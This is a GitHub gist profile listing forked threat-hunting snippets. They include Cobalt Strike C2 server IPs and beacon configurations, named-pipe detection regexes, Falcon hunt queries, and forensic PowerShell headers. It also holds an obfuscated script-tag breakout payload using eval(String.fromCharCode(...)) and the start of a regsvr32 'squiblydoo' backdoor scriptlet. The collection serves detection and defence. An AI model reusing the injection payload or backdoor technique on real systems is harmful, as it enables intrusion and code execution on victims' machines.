Skip to content

Instantly share code, notes, and snippets.

View cbresponse's full-sized avatar

cbresponse

0 followers · 7 following
View GitHub Profile
@cbresponse
cbresponse / Cobalt Strike - C2
Created September 19, 2021 07:17 — forked from MichaelKoczwara/Cobalt Strike - C2
Cobalt Strike/C2
{
"Ip": "42.193.225.116",
"Ports": ["42.193.225.116:22", "42.193.225.116:8888"],
"DefaultBeaconResponses": {
"http://42.193.225.116:8888/": "302/219"
},
"Jarm": "",
"Certificate": "",
"Beacons": null
}
@cbresponse
cbresponse / scanning_cobaltstrike_config.csv
Created September 16, 2021 17:20 — forked from svch0stz/scanning_cobaltstrike_config.csv
scanning_cobaltstrike_config.csv
We can make this file beautiful and searchable if this error is corrected: Unclosed quoted field in line 5.
ip,port,time_scanned,arch,Beacon Type,Port,Polling,Jitter,Max DNS,C2 Server,User Agent,HTTP Method Path 2,Header 1,Header 2,Injection Process,Pipe Name,Year,Month,Day,DNS Idle,DNS Sleep,Method 1,Method 2,Spawn To,Proxy Hostname,Proxy Username,Proxy Password,Proxy Access Type,CreateRemoteThread,Watermark
185.20.186.108,443,1.62002E+12,x86,8 (HTTPS),443,5000,0,,"185.20.186.108,/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books",,/N4215/adj/amzn.us.sr.aps,,,,,,,,,,GET,POST,%windir%\syswow64\rundll32.exe,,,,,,1359593325
185.20.186.108,443,1.62002E+12,x64,8 (HTTPS),443,5000,0,,"185.20.186.108,/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books",,/N4215/adj/amzn.us.sr.aps,,,,,,,,,,GET,POST,%windir%\sysnative\rundll32.exe,,,,,,1359593325
213.202.211.246,80,1.62002E+12,x86,0 (HTTP),80,10000,5,,"213.202.211.246,/metro91/admin/1/ppptp.jpg",,/metro91/admin/1/secure.php,,,,,,,,,,GET,POST,%windir%\syswow64\rundll32.exe,,,,,,0
213.202.211.246,80,1.62002E+12,x64,0 (HTTP),80,10000,5,,"213.202.211.246,/metr
@cbresponse
cbresponse / Cobalt Strike Named Pipe Regex.csv
Created September 16, 2021 17:20 — forked from svch0stz/Cobalt Strike Named Pipe Regex.csv
Cobalt Strike Named Pipe Regex
Regex Source
MSSE-[0-9a-f]{3}-server Default Cobalt Strike Artifact Kit binaries
status_[0-9a-f]{2} Default psexec_psh
postex_ssh_[0-9a-f]{4} Default SSH beacon
msagent_[0-9a-f]{2} Default SMB beacon
postex_[0-9a-f]{4} Default Post Exploitation job (v4.2+)
mojo.5688.8052.183894939787088877[0-9a-f]{2} jquery-c2.4.2.profile
mojo.5688.8052.35780273329370473[0-9a-f]{2} jquery-c2.4.2.profile
wkssvc[0-9a-f]{2} jquery-c2.4.2.profile
ntsvcs[0-9a-f]{2} trick_ryuk.profile
@cbresponse
cbresponse / FalconHuntqueries.md
Created January 5, 2021 10:13 — forked from ag-michael/FalconHuntqueries.md
Falcon hunt queries

timestamp convert:


 convert ctime(timestamp/1000)

.top,.club,.xyz,.ru domain lookups where the amount of lookup for the domain is more than 1 and less than 4 per computer


aid=* event_simpleName=DnsRequest | regex DomainName=".*\.top$|.*\.club$|.*\.xyz$|.*\.ru$|[0-9]+.*\.\w$" | stats values(ComputerName) count by DomainName| where count <4 | sort – count
@cbresponse
cbresponse / gist:410bdef54f5b45e36e8e40867d2b23d4
Created April 15, 2020 18:54 — forked from jonmarkgo/gist:3431818
</script><script language=javascript>eval(String.fromCharCode(102, 117, 110, 99, 116, 105, 111, 110, 32, 101, 110, 99, 111, 100, 101, 84, 111, 72, 101, 120, 40, 115, 116, 114, 41, 123, 10, 32, 32, 32, 32, 118, 97, 114, 32, 114, 61, 34, 34, 59, 10, 32, 32, 32, 32, 118, 97, 114, 32, 101, 61, 115, 116, 114, 46, 108, 101, 110, 103, 116, 104, 59, 10, 32, 32, 32, 32, 118, 97, 114, 32, 99, 61, 48, 59, 10, 32, 32, 32, 32, 118, 97, 114, 32, 104, 59, 10, 32, 32, 32, 32, 119, 104, 105, 108, 101, 40, 99, 60, 101, 41, 123, 10, 32, 32, 32, 32, 32, 32, 32, 32, 104, 61, 115, 116, 114, 46, 99, 104, 97, 114, 67, 111, 100, 101, 65, 116, 40, 99, 43, 43, 41, 46, 116, 111, 83, 116, 114, 105, 110, 103, 40, 49, 54, 41, 59, 10, 32, 32, 32, 32, 32, 32, 32, 32, 119, 104, 105, 108, 101, 40, 104, 46, 108, 101, 110, 103, 116, 104, 60, 51, 41, 32, 104, 61, 34, 48, 34, 43, 104, 59, 10, 32, 32, 32, 32, 32, 32, 32, 32, 114, 43, 61, 104, 59, 10, 32, 32, 32, 32, 125, 10, 32, 32, 32, 32, 114, 101, 116, 117, 114, 110, 32, 114, 59, 10, 125, 10, 36
@cbresponse
cbresponse / Get-KerberosTicketGrantingTicket.ps1
Created June 29, 2019 05:21 — forked from jaredcatkinson/Get-KerberosTicketGrantingTicket.ps1
Kerberos Ticket Granting Ticket Collection Script and Golden Ticket Detection Tests
function Get-KerberosTicketGrantingTicket
{
<#
.SYNOPSIS
Gets the Kerberos Tickets Granting Tickets from all Logon Sessions
.DESCRIPTION
Get-KerberosTicketGrantingTicket uses the Local Security Authority (LSA) functions to enumerate Kerberos logon sessions and return their associate Kerberos Ticket Granting Tickets.
@cbresponse
cbresponse / Backdoor.sct
Last active June 23, 2018 07:43 — forked from api0cradle/Backdoor-Minimalist.sct
Execute Remote Scripts Via regsvr32.exe - Referred to As "squiblydoo" Please use this reference...
<?XML version="1.0"?>
<scriptlet>
<registration
description="Bandit"
progid="Bandit"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
>
@cbresponse
cbresponse / Get-InjectedThread.ps1
Created June 18, 2018 12:55 — forked from jaredcatkinson/Get-InjectedThread.ps1
Code from "Taking Hunting to the Next Level: Hunting in Memory" presentation at SANS Threat Hunting Summit 2017 by Jared Atkinson and Joe Desimone
function Get-InjectedThread
{
<#
.SYNOPSIS
Looks for threads that were created as a result of code injection.
.DESCRIPTION
@cbresponse
cbresponse / Export-MFT.ps1
Created June 18, 2018 12:53 — forked from secabstraction/Export-MFT.ps1
function Export-MFT {
<#
.SYNOPSIS
Extracts master file table from volume.
Version: 0.1
Author : Jesse Davis (@secabstraction)
License: BSD 3-Clause
.DESCRIPTION